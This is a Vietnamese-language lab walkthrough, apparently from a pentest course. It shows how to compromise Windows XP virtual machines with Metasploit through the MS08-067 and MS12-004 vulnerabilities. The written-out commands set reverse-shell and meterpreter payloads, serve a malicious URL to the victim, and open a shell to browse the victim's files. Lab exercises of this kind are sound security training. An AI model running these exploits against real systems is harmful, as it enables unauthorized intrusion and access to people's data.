I. Khai thác lỗ hổng trên Windows XP với mã lỗi ms08_067Chuẩn bị 2 máy ảo: Windows XP (nạn nhân) và máy Back Track 5r3 (máy tấn công nạn nhân)

Trên máy Back Track cấu hình địa chỉ IP trong bài lab này cho máy là: 192.168.154.128

Các bước thực hiện:

Kiểm tra mạng giữa XP và máy Back Track 5r3:

Máy Back Track 5r3:

Máy Xp:

Kiểm tra thông mạng:

Trên máy Back track 5r3 ta gõ đường dẫn:

cd /pentest/exploits/framework

Ta tiếp tục gõ lệnh:

./msfcli windows/smb/ms08_067_netapi RHOST=192.168.154.129

LHOST=192.168.154.128 PAYLOAD=windows/shell/reverse_tcp E

Trong đó RHOST là IP máy Xp, LHOST là IP máy Back track 5r3.

Sau đó, ta chờ cho máy Back track 5r3 tấn công Xp

Cuối cùng ta đã tấn công được Xp, ta biết được các thông số của máy Xp

.

II. Khai thác lỗ hổng trên Windows XP với mã lỗi MS12_004Máy Backtrack 5r3 có IP là 192.168.1.2, máy xp có IP là 192.168.1.3

Trên máy Back track vào chương trình terminal và gõ lệnh msfconsole

Tìm mã lỗi bằng công cụ metaploit bằng cách gõ lệnh search ms12_004

Sau khi seach được mã lỗi ta dùng lệnh use và copy mã lỗi đã tìm được.

Dùng lệnh show options để biết thêm các câu lệnh cần thiết.

Dùng lệnh SRVHOST <địa chỉ ip máy backtrack>

Dùng lệnh set PAYLOAD windows/meterpreter/preverse_tcp

Dùng lệnh set LHOST <ip backtrack>

Dùng lệnh exploit để tiến hành khai thác lỗi. Chú ý đường dẫn http://192.168.1.2:8080/nếu máy nạn nhân vào đường dẫn này sẽ bị hack.

Trở lại máy Windows XP. Kiểm tra địa chỉ IP máy XP. Với địa chỉ ip máy XP là 192.168.1.3

Trên máy XP ta vào trình duyệt web và gõ đường dẫnhttp://192.168.1.2:8080/

Trên máy Back Track bắt đầu nhận thấy có sự kết nối đến địa chỉ

Và nhận thấy có địa chỉ kết nối vào. Và tạo phiên kết nối vào nó.

Trên máy back track ta gõ lệnh sessions để kiểm tra.

Dùng lệnh sessions –i 1

Xem trước thông tin XP:

Trên máy backtrack gõ getuid để biết thông tin máy Xp, và tài khoản đang truy cập.

Gõ sysinfo để biết thông tin chi tiết máy Xp:

Gõ lệnh shell để vào ổ đĩa máy XP:

Giờ thì ta có thể xem được các file trong ổ đĩa của máy XP.